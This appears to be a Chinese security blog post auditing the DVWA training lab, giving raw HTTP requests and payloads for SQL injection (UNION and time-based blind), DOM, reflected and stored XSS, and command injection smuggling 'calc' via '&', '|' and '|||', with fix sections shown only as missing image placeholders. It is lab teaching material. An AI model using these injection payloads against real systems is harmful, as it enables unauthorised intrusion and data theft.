4、DVWA代码审计(1)

一、SQL注入

1、sql注入(low)

限制

闭合单引号

复现

GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1
Host: ddd.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/sqli/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=jinqklehngsck6n4rn43r29hn6; security=low
Connection: close


在这里插入图片描述
在这里插入图片描述

代码

在这里插入图片描述

修复

在这里插入图片描述

2、sql注入(medium中等)

限制

复现

POST /vulnerabilities/sqli/ HTTP/1.1
Host: ddd.com
Content-Length: 163
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ddd.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/sqli/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=jinqklehngsck6n4rn43r29hn6; security=medium
Connection: close

id=-1 UNION ALL SELECT NULL,CONCAT(0x71627a7871,0x6e654d4a796e5757656548414256767a6c7657736b57584454496a61644a4d587a47566a476b4f45,0x7171716b71)-- -&&Submit=Submit

在这里插入图片描述
在这里插入图片描述

代码

在这里插入图片描述

修复

有函数过滤但还能并没有触碰限制

在这里插入图片描述

3、sql注入(高级)

限制

闭合单引号

复现

请求 URL: http://ddd.com/vulnerabilities/sqli/
请求方法: GET
状态代码: 200 OK
远程地址: 127.0.0.1:80
引用者策略: strict-origin-when-cross-origin
Cache-Control: no-cache, must-revalidate
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
Date: Tue, 04 Apr 2023 07:22:55 GMT
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Keep-Alive: timeout=5, max=99
Pragma: no-cache
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
Transfer-Encoding: chunked
X-Powered-By: PHP/7.3.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cache-Control: max-age=0
Connection: keep-alive
Cookie: PHPSESSID=eibl06n2nhgeuahjf753n5heir; security=high
Host: ddd.com
Referer: http://ddd.com/vulnerabilities/sqli/
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.62

在这里插入图片描述

代码

在这里插入图片描述

修复

在这里插入图片描述

4、sql注入(低级盲注)

限制

闭合单引号

复现

GET /vulnerabilities/sqli_blind/?id=1+%27or+sleep%282%29%23&Submit=Submit HTTP/1.1
Host: ddd.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/sqli_blind/?id=1+%27or+1%3D1%23&Submit=Submit
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=jinqklehngsck6n4rn43r29hn6; security=low
Connection: close


1 'and length(database())=4#
1' and substr(database(),1,1)='d'#

在这里插入图片描述

代码

在这里插入图片描述

修复

在这里插入图片描述

5、sql注入(中级盲注)

限制

复现

POST /vulnerabilities/sqli_blind/ HTTP/1.1
Host: ddd.com
Content-Length: 44
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ddd.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/sqli_blind/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=jinqklehngsck6n4rn43r29hn6; security=medium
Connection: close

id=2 and length(database())=4#&Submit=Submit

在这里插入图片描述

代码

在这里插入图片描述

修复

在这里插入图片描述

6、sql注入(高级盲注)

限制

复现

GET /vulnerabilities/sqli_blind/ HTTP/1.1
Host: ddd.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/sqli_blind/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: id=1+%27and+sleep(3)%23; PHPSESSID=jinqklehngsck6n4rn43r29hn6; security=high
Connection: close


在这里插入图片描述
在这里插入图片描述

代码

在这里插入图片描述

修复

在这里插入图片描述

二、XSS

1、xss(dom低)

限制

复现

GET /vulnerabilities/xss_d/?default=%3Cscript%3Ealert(111)%3C/script%3E HTTP/1.1
Host: ddd.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=jinqklehngsck6n4rn43r29hn6; security=low
Connection: close


在这里插入图片描述

代码

在这里插入图片描述

修复

删除前端解码函数

在这里插入图片描述

2、xss(dom中)

限制

过滤:<script

复现

具体请求:
本质思路就是通过闭合原本的标签,使得恶意xss的payload逃逸出来
GET /vulnerabilities/xss_d/?default=French111%3C/option%3E%3C/select%3E%3Cimg%20src=%27x%27%20onerror=%27alert(1)%27%3E HTTP/1.1
Host: aaa.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=5hhvrpfgm7eb7oql6ahkqfke2u; security=medium
Connection: close


在这里插入图片描述

代码

此地的限制就是检测到传入script标签,就直接跳转到指定的地址:
?default=English

在这里插入图片描述

修复

~此地可以直接通过去掉前端的解码函数解决
~也可以直接在vulnerabilities/xss_d/source/medium.php增加白名单,下一关就是对此思路的绕过
对传入default参数不是指定的4种语言就直接默认跳转
删除前端解码函数

在这里插入图片描述

3、xss(dom高)

限制

复现

payload:English#<script>alert('xss')</script>
GET /vulnerabilities/xss_d/?default=English HTTP/1.1
Host: ddd.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=e8ho8oc19et24e69md8905qmk8; security=high
Connection: close


在这里插入图片描述

代码

在这里插入图片描述
在这里插入图片描述

修复

在这里插入图片描述
在这里插入图片描述

4、xss(反射型低)

限制

复现

<h1>bbb</h1>
<script>alert(111)</script>
GET /vulnerabilities/xss_r/?name=%3Ch1%3Ebbb%3C%2Fh1%3E HTTP/1.1
Host: ddd.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/xss_r/?name=e
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=e8ho8oc19et24e69md8905qmk8; security=low
Connection: close


在这里插入图片描述

代码

在这里插入图片描述

修复

在这里插入图片描述

5、xss(反射型中)

限制

复现

<img src=x onerror=alert('XSS')>
GET /vulnerabilities/xss_r/?name=%3Cimg+src%3Dx+onerror%3Dalert%28%27XSS%27%29%3E HTTP/1.1
Host: ddd.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/xss_r/?name=%3Ch1%3Ebbb%3C%2Fh1%3E
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=e8ho8oc19et24e69md8905qmk8; security=medium
Connection: close


在这里插入图片描述
在这里插入图片描述

代码

在这里插入图片描述

修复

在这里插入图片描述

6、xss(反射型高)

限制

复现

payload:<img src=x onerror=alert('XSS')>
GET /vulnerabilities/xss_r/?name=%3Cimg+src%3Dx+onerror%3Dalert%28%27XSS%27%29%3E HTTP/1.1
Host: ddd.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/xss_r/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=e8ho8oc19et24e69md8905qmk8; security=high
Connection: close


在这里插入图片描述

代码

在这里插入图片描述

修复

在这里插入图片描述

最高级(impossible)

将获取的名字变量进行了编码

在这里插入图片描述

7、xss(存储型低)

限制

复现

payload:<script>alert(111)</script>
POST /vulnerabilities/xss_s/ HTTP/1.1
Host: ddd.com
Content-Length: 104
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ddd.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/xss_s/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=e8ho8oc19et24e69md8905qmk8; security=low
Connection: close

txtName=%3Ch1%3EA%3C%2Fh1%3E&mtxMessage=%3Cscript%3Ealert%28111%29%3C%2Fscript%3E&btnSign=Sign+Guestbook

在这里插入图片描述

代码

还使用了防注入的函数

在这里插入图片描述

修复

在这里插入图片描述

8、xss(存储型中)

限制

复现

payload: <img src='x' onerror='alert("XSS")'>
POST /vulnerabilities/xss_s/ HTTP/1.1
Host: ddd.com
Content-Length: 163
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ddd.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/xss_s/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=e8ho8oc19et24e69md8905qmk8; security=medium
Connection: close

txtName=%3Cimg+src%3D%27x%27+onerror%3D%27alert%28%22XSS%22%29%27%3E&mtxMessage=%3Cimg+src%3D%27x%27+onerror%3D%27alert%28%22XSS%22%29%27%3E&btnSign=Sign+Guestbook

在这里插入图片描述

代码

在这里插入图片描述

修复在这里插入图片描述

9、xss(存储型高)

限制

复现

payload:<img src='x' onerror='alert("XSS")'>
POST /vulnerabilities/xss_s/ HTTP/1.1
Host: ddd.com
Content-Length: 123
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ddd.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/xss_s/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=e8ho8oc19et24e69md8905qmk8; security=high
Connection: close

txtName=%3Cimg+src%3D%27x%27+onerror%3D%27alert%28%22XSS%22%29%27%3E&mtxMessage=%3Ch1%3EA%3C%2Fh1%3E&btnSign=Sign+Guestbook

在这里插入图片描述

代码

在这里插入图片描述

修复

在这里插入图片描述

三、命令执行

1、命令执行(low)

限制

复现

payload:
● www.baidu.com&calc
● www.baidu.com|calc
● "\"baidu.com&calc"
● www.baidu.com&&calc
POST /vulnerabilities/exec/ HTTP/1.1
Host: ddd.com
Content-Length: 37
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ddd.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/exec/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=e8ho8oc19et24e69md8905qmk8; security=low
Connection: close

ip=www.baidu.com%26calc&Submit=Submit

在这里插入图片描述

代码

在这里插入图片描述

修复

使用:escapeshellarg  和	 escapeshellcmd(推荐)   ,都可以修复

在这里插入图片描述

2、命令执行(medium)

限制

复现

payload:
● www.baidu.com&calc
● www.baidu.com|calc
● "\"baidu.com&calc"
POST /vulnerabilities/exec/ HTTP/1.1
Host: ddd.com
Content-Length: 37
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ddd.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/exec/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=e8ho8oc19et24e69md8905qmk8; security=medium
Connection: close

ip=www.baidu.com%26calc&Submit=Submit

在这里插入图片描述

代码

在这里插入图片描述

修复

使用:escapeshellarg  和	 escapeshellcmd(推荐)   ,都可以修复

在这里插入图片描述

3、命令执行(high)

限制

复现

payload:
● www.baidu.com|||calc
POST /vulnerabilities/exec/ HTTP/1.1
Host: ddd.com
Content-Length: 43
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ddd.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/exec/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=e8ho8oc19et24e69md8905qmk8; security=high
Connection: close

ip=www.baidu.com%7C%7C%7Ccalc&Submit=Submit

在这里插入图片描述
在这里插入图片描述

代码

代码过滤了  | 和 || 。使用 ||| 绕过

在这里插入图片描述

修复

在这里插入图片描述

  • 6
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值